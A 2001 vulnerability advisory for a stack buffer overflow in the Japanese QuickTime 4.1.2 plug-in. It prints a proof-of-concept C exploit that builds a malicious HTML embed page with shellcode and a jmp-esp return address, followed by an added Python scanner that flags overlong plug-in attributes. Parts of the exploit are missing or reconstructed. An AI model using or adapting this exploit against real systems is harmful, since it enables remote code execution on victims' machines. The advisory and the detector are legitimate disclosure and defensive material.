Reported January 31, 2001, by Shadow Penguin Security.

VERSIONS AFFECTED
  • Apple Quicktime Player 4.1.2 (Japanese)

DESCRIPTION

A remotely exploitable buffer overflow has been discovered in Apple's Quicktime Player 4.1.2 Japanese versions.  An attacker can alter the program's flow of execution by copying excessive amounts of data to the stack.

DEMONSTRATION

The following code was provided by UNYUN. (To compile it, remove the leading ; from each line.)

---------------------------------------------------------------------

;/*===============================================================
;Apple QuickTime 4.1.2 plug-in exploit
;The Shadow Penguin Security (http://shadowpenguin.backsection.net)
;Written by UNYUN (shadowpenguin@backsection.net)
;=============================================================
;*/
;
;/* header names were lost from the page; these are the ones the code uses */
;#include <stdio.h>
;#include <stdlib.h>
;#include <string.h>
;#include <windows.h>
;
;#define MOV_FILE "c:\\program files\\quicktime\\sample.mov"
;#define HEIGHT 60
;#define WIDTH 60
;#define TARGET "QUICKTIMEPLAYER"
;/* the opening <embed ...> part of this format string (the first two %s
;   conversions, for the .mov path and the overflow buffer) is missing from
;   the page as published */
;#define FILE_IMAGE \
;" ;"width=%d height=%d autoplay=\"true\" "\
;"target=\"%s\">\n"
;#define BUFSIZE 730
;#define RET 684
;#define ESP_TGT "rpcrt4.dll"
;#define JMPESP_1 0xff
;#define JMPESP_2 0xe4
;#define NOP 0x90
;
;unsigned char exploit_code[200]={
;0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
;0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
;0xFF,0xD0,0x00,
;};
;
;main(int argc,char *argv[])
;{
;FILE *fp;
;char buf[BUFSIZE];
;unsigned int i,pretadr,p,ip,kp;
;MEMORY_BASIC_INFORMATION meminfo;
;
;if (argc<2){
;printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
;argv[0]);
;exit(1);
;}
;
;if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
;printf("%s is not found.\n",ESP_TGT);
;exit(1);
;}
;
;/* locate a "jmp esp" (FF E4) inside rpcrt4.dll whose address contains no
;   zero byte; the loop bound was lost from the page and is presumed to be
;   meminfo.RegionSize, the only value the VirtualQuery call is used for */
;VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
;pretadr=0;
;for (i=0;i<meminfo.RegionSize;i++){
;p=kp+i;
;if ( ( p &0xff)==0
;|| ((p>>8 )&0xff)==0
;|| ((p>>16)&0xff)==0
;|| ((p>>24)&0xff)==0) continue;
;if ( *((unsigned char *)p)==JMPESP_1
;&& *(((unsigned char *)p)+1)==JMPESP_2)
;pretadr=p;
;}
;if ((fp=fopen(argv[1],"wb"))==NULL){
;printf("File write error \"%s\"\n",argv[1]);
;exit(1);
;}
;/* NOP-filled buffer, payload near the end, NUL-terminated for %s */
;memset(buf,NOP,BUFSIZE);
;memcpy(buf+700-12,exploit_code,strlen((char *)exploit_code));
;buf[BUFSIZE-2]=0;
;
;/* saved return address at offset RET is overwritten with the jmp esp address */
;ip=pretadr;
;printf("EIP=%x\n",ip);
;buf[RET ]=ip&0xff;
;buf[RET+1]=(ip>>8)&0xff;
;buf[RET+2]=(ip>>16)&0xff;
;buf[RET+3]=(ip>>24)&0xff;
;
;if (argc==2)
;fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
;else
;fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
;fclose(fp);
;printf("Done.\n");
;}
;
;-----
;UNYUN
;% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
;shadowpenguin@backsection.net (SPS-Official)
;unyun@shadowpenguin.org (Personal)
;% eEye Digital Security Team [ http://www.eEye.com ]
;unyun@eEye.com
;

VENDOR RESPONSE

It is unknown whether Shadow Penguin Security contacted the vendor. For a current workaround, a user can disable ActiveX or the QuickTime plugin.
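The demonstration above writes an HTML page whose plug-in tag carries a 730-byte NOP-padded attribute value. Beyond disabling the plug-in, a content filter or mail/web gateway can flag such pages. The scanner below is an added example, not part of the advisory or of UNYUN's code: it parses HTML, and reports any embed/object attribute value longer than a threshold, noting repeated-byte runs and non-printable bytes as corroborating signals. The threshold, the attribute name used in the constructed sample (pluginspage) and the sample documents are assumptions; the advisory does not show which attribute carried the overflow.

```python
import re
from html.parser import HTMLParser

# Assumed threshold: far longer than any legitimate URL or option value,
# well below the 730-byte buffer the PoC emits.
MAX_ATTR_LEN = 512
# A run of 64+ identical characters (the PoC pads with 0x90 NOPs) or a
# heavy share of non-printable bytes strengthens the finding.
RUN_RE = re.compile(r"(.)\1{63,}", re.DOTALL)
NONPRINT_RE = re.compile(r"[^\x09\x0a\x0d\x20-\x7e]")


class PluginTagScanner(HTMLParser):
    """Collect (tag, attribute, reasons) for overlong plug-in tag attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("embed", "object"):
            return
        for name, value in attrs:
            if value is None or len(value) <= MAX_ATTR_LEN:
                continue
            reasons = [f"len={len(value)}"]
            if RUN_RE.search(value):
                reasons.append("repeated-byte run")
            nonprint = len(NONPRINT_RE.findall(value))
            if nonprint > 16:
                reasons.append(f"non-printable={nonprint}")
            self.findings.append((tag, name, reasons))

    # self-closing <embed ... /> is handled the same way
    handle_startendtag = handle_starttag


def scan_html(text):
    """Return the list of findings for one HTML document."""
    parser = PluginTagScanner()
    parser.feed(text)
    parser.close()
    return parser.findings


# Constructed samples: a normal QuickTime embed, and one shaped like the PoC
# output (700 NOP bytes in an attribute value; attribute name is assumed).
BENIGN = '<embed src="sample.mov" width="60" height="60" autoplay="true" target="quicktimeplayer">'
SUSPECT = '<embed src="sample.mov" pluginspage="' + "\x90" * 700 + '" width="60" height="60">'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan_html(doc))
```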

CREDIT
Discovered by Shadow Penguin Security.